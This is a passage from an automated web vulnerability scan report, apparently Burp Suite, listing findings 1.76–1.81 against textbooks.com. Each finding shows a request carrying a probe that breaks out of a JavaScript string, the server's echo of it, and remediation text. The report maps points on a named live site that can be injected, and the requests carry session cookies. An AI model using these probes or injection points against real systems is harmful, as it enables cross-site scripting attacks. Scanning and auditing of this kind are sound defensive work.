Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3627
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:40 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
set() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/account.phpc03ba';65fb45ab654'

</script>
...[SNIP]...

1.76. https://www.textbooks.com/checkout.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad1ee'%3b08fab34f147 was submitted in the REST URL parameter 1. This input was echoed as ad1ee';08fab34f147 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout.phpad1ee'%3b08fab34f147 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:42 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/checkout.phpad1ee';08fab34f147'

</script>
...[SNIP]...

1.77. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd57'%3b52615774397 was submitted in the REST URL parameter 1. This input was echoed as ffd57';52615774397 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssffd57'%3b52615774397/tb-v3.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:09 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/cssffd57';52615774397/tb-v3.css'

</script>
...[SNIP]...

1.78. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63a9b'%3b0e876aee0a7 was submitted in the REST URL parameter 2. This input was echoed as 63a9b';0e876aee0a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tb-v3.css63a9b'%3b0e876aee0a7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/tb-v3.css63a9b';0e876aee0a7'

</script>
...[SNIP]...

1.79. https://www.textbooks.com/js/browse.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d65f'%3b922a7308c1e was submitted in the REST URL parameter 1. This input was echoed as 6d65f';922a7308c1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js6d65f'%3b922a7308c1e/browse.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js6d65f';922a7308c1e/browse.js'

</script>
...[SNIP]...

1.80. https://www.textbooks.com/js/browse.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb610'%3bf73ab7832ba was submitted in the REST URL parameter 2. This input was echoed as cb610';f73ab7832ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/browse.jscb610'%3bf73ab7832ba HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:08 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/browse.jscb610';f73ab7832ba'

</script>
...[SNIP]...

1.81. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78723'%3baff6123c54d was submitted in the REST URL parameter 1. This input was echoed as 78723';aff6123c54d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js78723'%3baff6123c54d/jquery-1.3.2.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 